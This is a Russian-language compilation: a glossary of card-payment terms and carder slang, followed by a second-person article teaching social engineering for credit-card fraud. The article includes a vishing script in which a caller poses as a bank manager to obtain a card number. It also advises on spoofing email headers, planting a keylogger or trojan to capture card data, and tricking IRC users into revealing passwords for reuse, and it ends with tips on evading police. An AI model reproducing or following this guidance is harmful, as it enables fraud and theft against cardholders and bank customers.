Real-Time Processing - процесс обработки платежей в режиме реального времени, когда верификация и обработка карточного платежа, немедленно следует за покупкой. Верификация в реальном времени занимает обычно несколько десятков секунд.
Receipt – чек, содержащий описание покупки по банковской карте, обычно включает следующую информацию: дата, имя и адрес продавца, сумма, уникальный номер и код авторизации.
Recurring Fees – регулярные, обычно ежемесячные платежи за пользование Merchant Account. Включают Discount Rate, Transaction Fee, Statement Fee, и Monthly Minimum.
Recurring Transaction – периодическое снятие денег со счета покупателя, происходящее на основании договора, заключенного между покупателем и предприятием торговли/услуг.
Retrieval Request (Copy Request) – требование продавцу представить документацию о конкретной транзакции. Обычно поступает от банка-эмитента в спорных случаях, когда держатель карты оспаривает сделку.
Secure Server – безопасный сервер, позволяющий установить с браузером защищенное соединение по протоколу SSL или SET
Session Key - ключ для симметричного шифрования, который используется ограниченное время, чаще для одного защищенного соединения, например, по протоколу SSL.
SET (Secure Electronic Transaction) - система обеспечения безопасности оплаты по банковским картам, разработанная компанией VISA, MasterCard, Microsoft и несколькими ведущими банками, основанная на шифровании с открытым ключом информации, связанной с параметрами карты, и разделением информации между участниками транзакции таким образом, что ни один из участников расчетов не обладает информацией целиком. С помощью стандарта SET покупатель и продавец могут однозначно идентифицировать друг друга, обменявшись цифровыми SET-сертификатами.
Settlement (Draft Capture) – процесс завершения платежа, когда транзакции посылаются вместе с кодами авторизации процессору платежей для перевода денежных средств продавцу.
Setup Fee – единовременная плата, взимаемая за открытие номера идентификации предприятия торговли/услуг в платежной системе (Merchant Account)
Shopping Cart Program – электронная корзина. Приложение, запускаемое на Интернет-сайте, предназначенное для сбора данных о товаре/услуге, которые посетитель намерен приобрести.
SIC Code – код стандартной бизнес-классификации (Standard Industry Classification). Это четырехзначное число, определяющее тип деятельности.
Smart Card – пластиковая карта, внутри которой находится микропроцессор, способный производить вычисления. Smart-карта предназначена для осуществления платежных, а также операций идентификации.
SSL (Secure Socket Layer) – протокол защищенной связи через Интернет. Основой протокола SSL является метод двухключевой криптографии, использующий для аутентификации взаимодействующих сторон и формирования общего ключа шифрования сертификаты открытых ключей пользователей (клиента и сервера), заверенные цифровой подписью специальных сертификационных центров.Благодаря серверам, поддерживающим протокол SSL, пользователь, загружающий сайт, может быть уверен в трех основных моментах:
Сайт действительно принадлежит компании, которая установила SSL свидетельство.
Используя уникальный «ключ сессии», протокол SSL шифрует всю информацию, которой обмениваются Интернет-сайт и его пользователи Это гарантирует, как минимум, что передаваемые серверу данные не будут просмотрены или перехвачены третьими лицами.
Данные, передаваемые посредством протокола SSL, не могут быть частично утеряны или заменены.
Одним из показателей безопасной связи является адресная строка браузера, в которой при безопасном соединении адрес будет начинаться с https:// вместо обычного http://, с которого начинаются адреса страниц, незащищенных протоколом SSL.
Statement Fee – фиксированная периодическая плата за пользование Merchant Account'ом.
Surcharges – дополнительная плата за прием платежей по банковским картам.
Swipe Discount Rate – процент, взимаемый эквайрером с продавца за каждое снятие денежных средств с физически доступной продавцу банковской карты.
Swiped Card - карта, информация с которой автоматически вводится с использованием POS-терминала.
Symmetric Cryptography –симметричная криптография или криптография с закрытым ключом. Криптографический алгоритм, в котором для кодирования и декодирования используется один и тот же ключ.
Terminal Capture – разновидность приема карточных платежей, когда информация о транзакциях хранится на компьютере продавца, причем последний вручную формирует из них Batch и затем направляет его для оплаты.
Third Party Processor – фирма, не принадлежащая платежной ассоциации VISA или MasterCard, нанимаемая эквайрером для проведения авторизаций и оплаты по пластиковым картам.
Ticket Only – покупка, для которой используется голосовая авторизация.
Transaction – любое взаимодействие между покупателем и продавцом, влияющее на состояние карточного счета покупателя.
Transaction Fee – фиксированная плата, взимаемая с продавца за каждую покупку (обычно в дополнение к Discount Rate).
Transaction File (Vendor File) – файл, в который процессор платежей помещает все транзакции, проведенные за предыдущий день.
Transaction Log – транзакции, записанные в порядке совершения.
Voice Authorization – голосовая авторизация. Применяется, когда нет подходящего устройства для проведения авторизации, например, POS-терминала.
Void – отказ покупателя от оплаты после того, как успешно прошла авторизация, принадлежащей ему карты. Транзакции, помеченные как Void, не включаются в Batch и не предъявляются к дальнейшей оплате.
Кардеры (от англ. "card" - карта) - профессиональные преступники, специализирующиеся на незаконной деятельности в сфере оборота пластиковых карт и их электронных реквизитов.
СЛОВАРЬ ЖАРГОННЫХ СЛОВ И ВЫРАЖЕНИЙ КАРДЕРОВ
БИН (от "банковский идентификационный номер" - англ. "bank identification number (BIN)") - номер, состоящий из 4-х цифр и предназначенный для идентификации банков - эмитентов платежно-расчетных карт в платежной системе. Как правило, первые четыре цифры в номере банковской карты совпадают с БИН ее эмитента.
ВАЛИДНАЯ КАРТА (от англ. "VALID" - "имеющий силу") - действующая или действительная карта; неподдельная карта; идентификационные реквизиты действующей или неподдельной карты.
ВАЛИДНОСТЬ (от англ. "VALID THRU" - "имеет силу до…") - срок действия карты.
ВЕБМАНИ (web money, WM) - платежная система сети "Интернет" (используется для криминальных расчетов при покупке и продаже информации о реквизитах чужих карт, оказании консультационных кардерских услуг и др.); деньги, полученные от незаконной деятельности в сети "Интернет".
ВНЕДРЕНЕЦ - член организованной преступной группы из числа сотрудников мерчанта, эквайрера или эмитента.
ГЕНЕРАТОР (generator) - вредоносная программа для ЭВМ, осуществляющая генерацию цифровых идентификационных реквизитов (обычных и электронных) пластиковых карт (как правило, идентификационной пары).
ЖЕЛЕЗО - аппаратные средства ЭВМ; электронный терминал без программного обеспечения; оборудование для подделки пластиковых карт (персонализатор, принтер, эмбоссер, ламинатор и др.).
ИНФА (infa) - информация, сведения о чем-либо.
КАРДИНГ (carding) - противоправная деятельность в сфере оборота пластиковых карт и их номеров; совершение каких-либо конкретных действий над чужими пластиковыми картами или их номерами.
КАРТЫ (cardz) - платежно-расчетные карты.
КОД-ГРАББЕР - вредоносная программа для ЭВМ, подбирающая секретный ключ, пароль или код доступа к программному обеспечению электронного терминала либо базе данных мерчанта, эквайрера, эмитента для осуществления операции с использованием пластиковой карты или хищения конфиденциальных данных.
КОДЕР (coder) - техническое устройство для записи компьютерных данных (электронных реквизитов) на магнитную полосу карту.
КОДИНГ (coding) - запись компьютерных данных (электронных реквизитов) на магнитную полосу карты.
КОДЫ (codes, codez) - коды доступа к конфиденциальной информации базы данных виртуального магазина, банка-эквайрера или эмитента либо на охраняемый объект; ПИН-код; алгоритм "взлома" защиты от несанкционированного доступа к компьютерной информации или на охраняемый объект.
КОРДЕР (corder) - преступник, специализирующийся на подделке карт с магнитной полосой.
КРЕДА (creda) - кредитная или другая банковская карта либо информация о ней.
КРИПТ (cript) - криптографический алгоритм преобразования данных; программа генерации идентификационных пар и других цифровых идентификационных реквизитов банковских карт.
КРЯК - "взлом" средства защиты от несанкционированного доступа к конфиденциальной компьютерной информации, содержащейся на пластиковой карте либо клиентской базе данных виртуального магазина, банка-эквайрера или эмитента.
ЛАМЕР (LAMER, LAM3R) - держатель карты или клиент виртуального магазина - потенциальный потерпевший; начинающий кардер.
МЕРТВАЯ КАРТА - карта, не представляющая никакую ценность; карта, с помощью которой по каким-либо причинам нельзя осуществлять операции (находящаяся в розыске, заблокированная, операции по которой отслеживаются правоохранительными органами и т.п.); карта, которую нельзя подделать.
НОМЕР КРЕДЫ - любой идентификационный номер карты; идентификационная пара карты; электронный реквизит карты.
ОРДЕРИТЬ - заказывать товар в виртуальном магазине с использованием реквизитов банковской карты.
ОТМЫТЬ КАРТУ - перевести деньги с карты - со специального карточного счета на другой счет, пользуясь целой цепочкой промежуточных счетов и платежных систем; скрыть ("замести") следы перемещения похищенных денег.
ПАТЧ, ПАЧ (от англ. "patch" - заплата, заплатка) - изменение в электронном реквизите карты или программе для ЭВМ.
ПАТЧИТЬ, ПАЧИТЬ - вносить изменения в электронные реквизиты карты или программу для ЭВМ или.
ПЕРЕШИВАТЬ - изменять, перепрограммировать компьютерные данные (электронные реквизиты), содержащиеся на интегральной микросхеме карты.
ПИН (от англ. "personal identification number" (PIN) - "персональный идентификационный номер") - ПИН-код или PIN-код: секретный ключ электронной цифровой подписи, выдаваемый пользователю (держателю карты, абоненту) сети ЭВМ или электросвязи для его идентификации и предоставления доступа к компьютерной информации.
ПЛАСТИК (plastic), ПЛИТКА - реально существующая пластиковая карта.
ПРОВЕРКА НА ВАЛИДНОСТЬ - проверка на правильность подбора номера, идентификационной пары, ПИН-кода или электронного реквизита карты; проверка на то, принимает ли мерчант карту для проведения платежно-расчетной операции или нет.
ПРОКСИ-СЕРВЕР (от англ. "proxy-server" - "сервер, предоставляющий полномочия") - управляющая ЭВМ компьютерной сети (сервер), которая проводит автоматическую авторизацию пользователей (держателей карт или абонентов) по секретному ключу (ПИН-коду или паролю) и дает разрешение на доступ к компьютерной информации, а также работу с ней.
ПРОШИВА, ПРОШИВКА - программное обеспечение (набор программ для ЭВМ), хранящееся в памяти интегральной микросхемы.
ПРОШИТЬ - записать в память интегральной микросхемы какие-либо данные; тоже, что и "перешивать".
РЕАНИМАТОР (reanimator) - преступник, специализирующийся на подделке ("подзарядке") карт с фиксированной покупательной способностью.
CVC2/CVV2 - последние три цифры номера банковской карты, которые вычисляются по алгоритму криптографического преобразования данных DES с использованием секретного ключа банка - эмитента и устанавливают математическую зависимость номера карты от срока ее действия.
СИМА, СИМКА - SIM-карта.
СЛИТЬ С КАРТЫ - снять деньги с карты - со специального карточного счета или перевести их на другой (как правило, свой) банковский счет; совершить хищение денег с использованием чужой пластиковой карты или ее реквизитов.
ТРЕЙДИНГ (trading) - торговля, обмен похищенной конфиденциальной информацией о реквизитах пластиковых карт и их держателях. Например, "я тебе спам-лист на 3 млн. юзверей, а ты мне 10 валидных кред с cvv2".
ФЕЙКОВЫЙ МАГАЗИН - виртуальный лжемагазин, предназначенный для мошеннических операций с реквизитами банковских карт и персональными данными их держателей (по типу "фирм - однодневок").
ФРАУД (fraud) - незаконные операции, совершаемые с использованием пластиковых карт и их реквизитов.
ХАЧИТЬ, ОТХАЧИТЬ, ЗАХАЧИТЬ, ПРОХАЧИТЬ - осуществлять копирование, модификацию либо блокирование программы для ЭВМ, базы данных или конфиденциальной компьютерной информации.
ЭЛИТА (ELITE, ELYTE) - кардер - профессионал, "авторитет".
ЮЗВЕРИ, ЮЗЕРЫ (от англ. "to use" - пользователь) - держатели пластиковых карт; клиенты электронных платежных систем; пользователи сети ЭВМ "Интернет". Эмбоссер - устройство для выдавливания символов на карте.
Карт принтер - принтер для печати информации (картинки) на карте.
Трек (Дорога) - часть дампа с определенной информацией каждый. 1-ый трек - информация о владельце карты, 2-ой трек - информация о владельце карты, о банке выдавшем карту, и прочее, 3-ий трек - можно сказать, запасной, используется магазинами для начисления очков и прочего.
Дамп - информация, которая пишется на магнитную полосу карты, состоит из 1,2 или 3 треков.
Белый пластик - кусок чистого пластика, на который наносится информация.
акк (от англ. account) - счет.
биллинг (от англ. bill - счет)- платежный, платежная система.
ебэй, ебай - название аукциона eBay [и:'бэй].
мерчант (merchant) - торговый счет, система он-лайн торговли.
транзакция - сделка, проводка по счетам. дроп - общее название того, кто принимает "грязный" товар или деньги, бывают профессиональными (осознают что делают) или жертвами, которые не осознают того, что делают.
палка - система денежных переводов PayPal;
реальный пластик - поддельная кредитная карта, которую возможно использовать для покупок в реальных магазинах. Такая карта является своего рода дубликатом где-то реально существующей кредитной карты.
эноролл (от англ. enroll) - привязка кредитной картыбанковского счета к он-лайну, с возможностью изменять их данные через интернет.
юзать (от англ. use) - использовать.
Access Control Cards - Карта системы контроля доступа, Пропуск
Пластиковые карты, используемые для организации доступа в помещения, обычно выполняются в виде карт с магнитной полосой или бесконтактных смарт-карт.
Эквайр - Банк или иной финансовый институт, заключивший договор с торговой организацией на приём платёжных карт и ответственный за оплату счетов владельцев карт.
Authentication - Технология удостоверения личности в автоматизированной информационной системе
Authorization - Авторизация, требование оплаты. Блокирует деньги на счету, уменьшая свободную (Open to Buy) для покупок сумму. Чтобы снять деньги, необходимо завершить авторизацию, см. Settled. Если за время, которое определяется эмитентом (см. Issuer), авторизация не завершается, она отменяется и ранее заблокированная сумма освобождается для покупок
Batch - Набор транзакций, сохраняемый для одновременной оплаты, которая происходит обычно раз в день.
Batch можно завершить как автоматически, так и с помощью POS-терминала
BIN - Bank identification number (Банковский идентификационный номер) - уникальный номер, который присваивает банку платежная система на совершение операций по эмиссии и эквайрингу пластиковых карт.
Encoding - Кодирование
Процесс записи информации на магнитную полосу или микросхему памяти смарт-карты.
Factoring - Ситуация, когда собственный Merchant Account используется для приема за дополнительную плату платежей для другого продавца. Factoring считается нелегальной операцией. Чтобы легализовать Factoring, необходимы специальные юридические схемы, как, например, в CCNOW (www.ccnow.com).
Holdback - Часть средств, полученных продавцом от карточных платежей, блокируемая эквайером или другим MAP, чтобы покрыть расходы на chargeback и другие спорные выплаты. По истечении определенного срока Holdback возвращается продавцу.
Слип - синоним слову чек применительно к карточным расчётам.
Чарджбек - опротестование банком кардхолдера снятия денег с его карты.
адалт, адульт (от англ. adult [эдалт]-взрослый)
1. сайт с содержанием только для взрослых, порно-сайт;
2. направление работы в кардинге.
акк (от англ. account) - счет.
аук - сокращ. от аукцион.
биллинг (от англ. bill - счет)- платежный, платежная система.
ебэй, ебай - название аукциона eBay [и:'бэй].
мерчант (merchant) - торговый счет, система он-лайн торговли.
cc, креда - кредитная карта.
ccv (сокр. от Credit Card Verifier) - дополнительный защитный код в кредитной карте.
дамп (dump) - информация с магнитной ленты или чипа кредитной карты.
Кардинг (термин впервые появился в рунете в начале 90х годов прошлого столетия
1. (юридическое определение) вид мошенничества с использованием пластиковых карт или информации которую они содержат. Как преступление относится к высоко-интеллектуальным или т.н "бело-воротничковым";
2. (экономико-политическое определение) добровольно- принудительное перераспределение денежных средств от банков стран с высокой концентрацией спекулятивного капитала к активным экономическим субъектам с высокой концентрацией интеллекта;
3. (филосовск. определение) ловкость ума и никакого мошенства.
транзакция - сделка, проводка по счетам.
холдер (holder - держатель) - настоящий владелец реальной кредитной карты.
дроп - общее название того, кто принимает "грязный" товар или деньги, бывают профессиональными (осознают что делают) или жертвами, которые не осознают того, что делают.
грязь, грязные деньги/товар - деньги или товар незаконное приобретение которых возможно проследить;
чистые либо "отмытые" товарденьги - деньги или товар незаконное приобретение которых проследить НЕвозможно;
картон, картофель - данные где-то реально существующей кредитной карты, которые используются кардером как правило только для транзакций через интернет;
нал - 1. наличные деньги; 2. процесс перевода денег из безналичной формы в наличные, обналичка; 3. см также "отмыв" .
налить - обналичивать;
отмыв - превращение "грязных" денег в "чистые", то есть такие, незаконное происхождение которых невозможно или крайне трудно отследить и доказать; обрыв связи денег с их незаконным происхождением.
палка - система денежных переводов PayPal;
реальный пластик - поддельная кредитная карта, которую возможно использовать для покупок в реальных магазинах. Такая карта является своего рода дубликатом где-то реально существующей кредитной карты.
спам - рассылка писем по электронной почте в неограниченных количествах.
сокс, сокс-прокси (англ. socks-proxy) - сервер-посредник между вашим компьютером и конечным серверомсайтом, используемый чтобы скрыть ваш IP-адрес.
шоппинг (от англ. shopping) - покупки или серия покупок в магазине.
эноролл (от англ. enroll) - привязка кредитной картыбанковского счета к он-лайну, с возможностью изменять их данные через интернет.
юзать (от англ. use) - использовать.
Некоторые часто встречаемые англ. сокращения
DL, driver lisence - удостоверение на право управления транспортным средством, водительские права
ID, identity document - удостоверение личности
DOB, date of birth - дата рождения
SSN, Social Security Number - государственный номер, который присваивается для каждого жителя США для целей налогообложения и учета движения денежных средств, в том числе и кред. истории
SIN - канадский аналог SSN
MMN, mother's maiden name - девичья фамилия матери
PIN, personal identification number - аналог пароля, состоит только из цифр и используется для авторизации.
Этот раздел кардерского искусства очень важен. Большинство взломов происходит не без помощи социальной инженерии, и именно она подчас определяет провал или успех операции. Собственно, для некоторых операций социальная инженерия – единственное, что нужно для их осуществления.
Социальная инженерия
Социальная инженерия (Social Engineering) - это наука, с помощью которой происходит управление людьми против их воли и желания. Она была изобретена фрикерами уже довольно давно: лет двадцать - тридцать назад. Кстати, очень известными специалистами СИ были Кевин Митник и Росско.
В этой статье будет использоваться толкование, относящееся исключительно к компьютерной безопасности. То есть сейчас СИ - это способ нелегального доступа к секретной или личной информации путем обмана людей. Неброско, зато ясно. Обычно цель атаки СИ одна - получить пароль, необходимый для доступа к какой-либо секретной базе данных, в последнее время целью СИ часто является номер кредитки незадачливого юзера.
Простейшая СИ атака делится на 3 фазы: диверсия, реклама, помощь. С диверсией все просто, кардер-хакер просто нарушает работу компьютера жертвы любым способом. Это может быть как банальный вирус на дискете или в письме, так и хорошая атака на хост из Сети. После того, как комп загнулся, наступает второй этап взлома: реклама. Здесь кардер информирует жертву всеми доступными средствами (бумажные объявления, общие друзья, ICQ, спам), что именно он сможет вернуть к жизни безвременно скончавшуюся ОС. И только следующим шагом становится непосредственно помощь. Под "помощью" кардеры понимают восстановление компьютера, в ходе которого происходит незаметное для юзера выманивание из него необходимой инфы. О способах помощи мы поговорим чуть ниже, а сейчас рассмотрим места, где обычно проводятся атаки класса СИ.
Знал бы, где упадешь...
Излюбленные орудия и способы кардеров, проводящих такие атаки, широко известны: телефоны, как обычные, так и сотовые, личные встречи с жертвой, письмо - обычное бумажное или послание по мылу, различные чаты в сети (ICQ, IRC, банальный web-chat). Дальше я постараюсь изложить основные тонкости каждого.
Телефон - средство кардера
Начнем, пожалуй, с самого старого, но и сейчас активно используемого способа: общение с жертвой по телефону.
Вот основные плюсы такого метода:
Достаточно высокая анонимность, особенно при использовании левой линии с антиАОНом или звонка с таксофона.
Высокая эффективность, которая объясняется возможностью представиться любым человеком, и, при наличии навыков, атакуемый не заметит подвоха.
Быстрые результаты - кардеру не нужно ждать, пока дойдет письмо или вернется инет, упавший из-за грозы. При использовании мобильника мы получаем полную свободу, что немаловажно в трудовые будни. На этом плюсы социальной инженерии с использованием телефона заканчиваются и начинаются отрицательные стороны.
Самая большая проблема – это твой голос, особенно если человек на другом конце провода хорошо знает того, за кого себя выдает взломщик (к примеру, менеджера банка Х). Встает необходимость смены голоса любыми способами. Если не получается подобрать тон, то атакующий часто пытается сослаться на болезнь (хотя я сомневаюсь, что здоровый еще час назад человек может вдруг заболеть ларингитом с полной потерей голоса). Дальше стоит проблема фона - в любой организации добиться абсолютной тишины невозможно, а особенно в банках (я так часто говорю про банки потому, что кардеры чаще выдают себя за высокопоставленных служащих банка атакуемого). И значит, если некто позвонит в разгар рабочего дня и в его "офисе" будет стоять гробовая тишина, то кардеру не поверят или заподозрят неладное. Значит, необходимо применить одну из следующих уловок: телефонный аппарат, генерирующий шум офиса, запись из реального рабочего офиса или трансляция посредством радиожучков из другой организации (выбирается предельно тщательно). С технической стороной этого способа мы познакомились, переходим к самому радикальному и опасному - личная встреча.
Connect on TET-a-TET!
У встречи с жертвой, так сказать, тет-а-тет есть как явные недостатки, так и явные преимущества. К недостаткам относится то, что кардера, возможно, запомнят, следовательно он должен найти время и очень тщательно подготовиться - начиная с одежды и заканчивая прической, все должно соответствовать имиджу делового респектабельного человека (вряд ли лохматый и небритый голодранец может внушить доверие). Как ты понимаешь, из этого следуют и проблемы с поведением - кардер должен контролировать свои эмоции и вести разговор на "правильном" языке, не используя сленга, эффект от которого прямо противоположный.
Расстояние также играет немаловажную роль - при атаке с помощью телефона взломщик может находиться за тысячи километров от жертвы и добиться результатов без проблем, а для встречи ему придется приехать в город атакуемого. Несмотря на эти недостатки, СИ во время личной встречи не спешит сдавать позиции, поскольку способ этот не лишен достоинств - во время общения кардер видит человека, а значит, легко поймет, верит он ему или нет. Это позволяет моментально корректировать тактику атаки. Профессиональные кардеры имеют в запасе множество мелких психологических приемов (с некоторыми можешь познакомиться во врезке), которые резко повышают эффективность их труда. А истинные гуру не только имеют за плечами психологическую подготовку, но и владеют приемами гипноза, что позволяет им добиться практически стопроцентной эффективности, не оставляя следов. Этот способ оправдывает себя, только если человек имеет немалый опыт убеждения людей или владеет спецподготовкой (тут рулят психологи и психиатры).
Дальше я расскажу тебе о способах, появившихся совсем недавно, но уже получивших немалое распространение. Открывает наш мини-обзор инет-средств СИ простая электронная почта. Именно с помощью посланий по e-mail проводятся многие атаки, направленные на получение не только твоей креды, но и личной инфы более интимного характера. Я бы сказал даже, что большинство таких атак проведено именно с помощью электронной почты, поскольку она позволяет без проблем обрабатывать несколько человек одновременно.
Сеть нам кардить и жить помогает
В сущности, такая атака довольно проста - кардер переписывается с жертвой с левого почтового ящика и пытается выудить нужную инфу. При всей простоте проведения, необходимо учитывать некоторые тонкости, связанные с почтовой программой и заголовками письма. Так, сначала следует узнать, каким почтовиком пользуется человек, за которого взломщик выдает себя. Для этого достаточно получить от жертвы любую мессагу и, заглянув в заголовки (в аутлуке – «свойства письма», в бате – «F9», а в kmail жми на V), выяснить значение поля X-Mailer. Еще надо постараться, чтобы заголовки письма не содержали инфы, которая может выдать атакующего с потрохами. И хотя обычные люди вряд ли станут проверять, откуда пришло письмо, страховка еще никому не мешала. Итак, основная проблема – IP-адрес отправителя мессаги. Именно с его помощью были пойманы первые начинающие кардеры. Для того чтобы не оказаться в их числе, при отправке своих посланий кардеры юзают один из следующих способов. Первый состоит в простой перенастройке своего почтовика на другое имя и другой сервак, лучше применить систему профилей для каждой жертвы, чтобы не лезть каждый раз в настройки. Второй способ также несложен - найти программу, которая позволяет самому заполнять служебные поля, но здесь кардер старается всеми способами получить доступ к реальному почтовому серверу подставляемого чела. А вот третий гарантирует очень высокую эффективность, правда, с некоторыми затратами мозговых ресурсов кардера. Для выполнения диверсии следует с помощью простого терминала (стандартный от виндов подойдет на 100%) подключиться к серверу SMTP на 25 порт и продиктовать все поля с терминала. Помогают также и проги, типа Anonymity Mailer, позволяющие отправлять почту от любого имени (например, [email protected]).
/dev/hands and /dev/mozg в бой!
Теперь перейдем к тому, как все-таки в реальной жизни используется СИ атака. Первый распространенный способ - это звонок по телефону, в результате которого происходит примерно такой диалог между кардером и жертвой:
- Кардер: Здравствуйте, это Василий Лохов?
- Жертва: Да.
- К: Я - Иван Иванов, менеджер отдела по работе с пластиковыми картами банка Ч. Вчера нам пришел запрос на перевод $1053 с вашего счета на счет интернет-магазина, который числится у нас в черном списке (больше воды и крутизны!). Наш банк очень беспокоится за своих клиентов, и поэтому просим подтвердить передачу денег.
- Ж: А… У… Я… Я ничего не покупал…
- К: Хм. Странная ситуация. Вы никому не сообщали номер своей кредитной карты?
- Ж: Нет.
- К: Тогда, возможно, это ошибка нашего программного обеспечения… только 3 дня назад перешли на новую версию (банк крут, шагает в ногу со временем). Назовите номер вашей карты и дату окончания действия, мы сверим и сообщим результат. Если это ошибка с нашей стороны, то ваш счет будет восстановлен.
- Ж: Сейчас-сейчас. 987654321 01/04.
- К: Спасибо, сейчас будет проведена проверка. В течение 2 часов не проводите платежных операций с пластиковой картой нашего банка. До свидания!
- Ж: До свидания.
После такого разговора крайне желательно позвонить и успокоить юзера, что все нормально, его счет цел и невредим. Если жертва - простак, то он не побежит в банк и не станет узнавать у менеджера Ивана Иванова об ошибках ПО. И через некоторое время с ужасом обнаружит опустошение лицевого счета. А если кардер понимает, что жертва очень подозрительна, то старается провести все покупки моментально, либо вообще никогда (если атакуемый узнает, что никакой ошибки не было и что Иван Иванов уже 3 дня греется на Канарах, он обязательно заблокирует карту).
А еще вот так...
Следующий способ был найден совершенно случайно. Его реализация не требует больших затрат, да и СИ тут не так уж много. Представь себе следующее: есть некий инет-магазин (пусть будет абсолютно любой, ломать мы его не будем), в этом магазине жертва покупает любой товар, и номер его креды у тебя! Как? Секрет фокуса прост: ты ставишь ему на машину троянца/логгер клавиатуры и, как только получаешь необходимый номер, уничтожаешь все следы. А задача социальной инженерии тут в том, чтобы любым способом упросить человека купить что-то именно в этом магазине по СВОЕЙ креде. На все вопросы отвечай, что твоя кредитка пуста, а не платишь... ну, хотя бы потому, что хочешь завести другую, или твоя подруга требует много наличных сразу (это проходит - проверено). И обязательно пообещай возместить (и возмести!) все денежные затраты, плюс угости пивом, чтобы снять с себя подозрения. Но при всей простоте существует маленькая загвоздка: если жертва не начнет сразу проводить операции с кредой, тебе будет трудновато найти номерок в куче введенных символов. Поэтому - сходи сам на страничку закупки товаров этого магазина, найди обязательные поля и запомни, по ним искать будет проще.
Пока ты ищешь жертву, я тебе расскажу еще об одном способе. Сейчас нашим местом действия являются IRC-каналы и сети. Если человек, которого ты хочешь подставить, пользуется иркой, то тебе все карты в руки, дерзай.
Ирка... Как много в этом слове для сердца кардера слилось
Для начала выясним пароль на IRC жертвы, точнее, его она нам сообщит сама. Подготовка минимальна: 2 запущенных IRC-клиента у тебя на компе, причем один бот, а второй любой ник (из-под него ты будешь инженерить), причем ник твой должен иметь права оператора канала, хотя бы временно. После этого начинается СИ атака на юзера/юзеров, которая состоит из того, что ты шепчешь (или на весь чат произносишь), что для получения операторских прав достаточно послать сообщение боту канала. Но тем, кто никогда не был оператором (чувствуешь подвох?) необходимо провести идентификацию своего IP и DNS. Для выполнения этой операции напиши /msg bot identify твой_ irc_пароль. Робот проведет все настройки и будет встречать тебя по паролю. А дальше необходимо подготовить отступление: ты всем или только оператору канала сообщаешь, что уходишь и, возможно, не появишься несколько дней по причине отъезда. Затем, слезно попрощавшись со всеми... закрываешь второй IRC-клиент. А первый, с ботом, не трогаешь. Осталось только ждать получения пароля юзера в чистом виде. Дальше, ведь ты сейчас робот, необходимо отправить уведомление об аутентификации. И только после этого можешь смело отсоединяться от канала. И дальше начинаешь пробовать этот пароль к другим IRC-каналам, местным web-чатам и даже к аське. Очень многие имеют только один пароль на множество личных ресурсов, объясняя это нежеланием запоминать много "ненужной" инфы. Ну что ж… пусть поплатятся! А дальше, используя найденный пароль, начинаешь проводить СИ атаку на знакомых жертвы, цель которой - все та же креда.
Чем все кончается
Еще я должен рассказать тебе о том, как может повести себя жертва во время и после проведения атаки. Обычно все проходит гладко, но кто предупрежден, тот вооружен.
Жертва, ничего не подозревая, попадается на твою диверсию. Тут даже комментарии излишни ;-). Ты просто наслаждаешься плодами атаки и особо ни о чем не задумываешься. Вся работа после нападения сводится лишь к периодической проверке, как идут дела у жертвы с кредой, и выяснению – а не заметил ли он проблем. Самый благоприятный для кардера вариант.
Атакуемый достаточно умен и не поддается на твои уловки. В такой ситуации перед кардером встает выбор: попробовать другие методы или отстать от этого чела. Если ты выбираешь второе, то сохрани с уже бывшей жертвой дружбу. А если ты воинственный индеец и не думаешь закапывать топор войны, то дерзай! Хотя трудности прибывают с каждым новым заходом, так как жертва видит, что к ее персоне ты проявляешь повышенное внимание. Еще раз повторяю, необходимо быть предельно осторожным при повторных атаках. Просто помни, что жадность фраера сгубила.
Владелец креды просек, что его очень хотят развести на креду, но никуда не обратился. Такой исход, конечно, плох, но не смертелен - твоей свободе ничто не угрожает, правда могут поползти слухи о твоей грязной политике. Это испортит твою репутацию, поэтому постарайся при первых же недовольных воплях жертвы среагировать и исправить все на месте. Можешь прикинуться дурачком, который ничего и никогда не замышлял. И успокаивай себя тем, что ничего еще не потеряно.
Бывший друг не просто понял, что его пытаются кинуть, но и обратился куда следует с заявлением (бывает, что у него там еще и друзья). Это уже не очень хорошо, хотя и до срока тоже пока далеко. Чтобы не приближать этот момент – будь законопослушен, не нарушай, просто помни – ты можешь быть под прицелом. Примерно через полгода можешь браться за старое, но уже с удвоенной осторожностью. А вот если к тебе уже приходили - завязывай с кардингом, у них кое-что существенное на тебя есть. И самое главное, никогда не расставайся с наукой СИ, даже на допросах. Главная причина гибели юных талантов на нарах проста: они забывают, что следователи тоже люди, пусть и замаскированные в форму. А значит, и к ним можно применить трюки кардера. Правда, в школах милиции тоже учат психологию, но кто же помнит, чему его учили в вузе?
Психологические трюки кардера!
Трюки, о которых я тебе расскажу, используются очень многими – кардерами, хакерами, психологами, менеджерами и прочими обманщиками. Уверен, что они помогут тебе не только во взломе, но и в личной жизни.
Если хочешь воздействовать на чувства человека - говори в левое ухо, на логику - в правое, но учти, что пропитое лицо, прочувствованно просящее номер креды, вряд ли добьется успеха!
Разговаривай с объектом на привычном для него языке. Так, если это простой человек, мало смыслящий в ИТ и, в частности, в кредах, не используй жаргон. Лучше пять раз объяснить свою мысль на его языке, зато тебя поймут, и не возникнет разрыва в беседе.
Лучше всего память работает между 8-12 часами утра и после 9 часов вечера, хуже всего - сразу после обеда.
Незаконченные действия (разговор, утверждение контракта, встреча) запоминаются в два раза лучше доведенных до конца.
Наука подсчитала, что человек говорит только 80% из того, что хочет сообщить, собеседники воспринимают 70% из этого, а понимают - 60%, запомнят от 10 до 25% всей инфы. Поэтому грузи и не жалей.
Чтобы жертва прониклась твоей мыслью, повторяй основные ее тезисы как можно чаще, но не переусердствуй! А то будешь только и говорить: "Дай номер креды!!!"
Старайся не просить в открытую, пусть человек поймет, что тебе нужно, и предложит сам.
Отвечая на любое резкое утверждение, жертва может легко выдать себя с потрохами, поэтому - озадачивай и озадачивай.
Базовой гипнотической способностью обладают все люди, особенно с сильной волей, поэтому, если ты пытаешься убедить человека, старайся смотреть ему в переносицу и думать, о чем говоришь.
Возраст влияет на мозг человека, например, молодежь лучше соображает вечером, а пенсионеры утром.
Многие вопросы, требующие ответа "да" или "нет", сбивают говорящего с предыдущей мысли, так что если тебя начали подозревать, используй это.
Некоторых людей можно вызвать на откровенный разговор, только показывая, что ты им не веришь.
Доказывая свою правоту, используй только факты и тезисы, которые может понять объект.
Старайся выглядеть знающим человеком в своей области, простые люди инстинктивно тянутся к более умным и знающим.
Фраза, произносимая дольше 5-6 секунд без пауз, перестает восприниматься.
Полезно придавать отдельным утверждениям форму нейтрального вопроса (например, риторического), тогда твой собеседник не ощутит давления и сможет воспринять подобную подачу как собственное мнение.
Все. Моя статья закончена, надеюсь, тебе было интересно, и ты узнал кое-что новенькое о жизни кардеров - социальных инженеров.
Софт для безопасности
Proxy
Proxifier
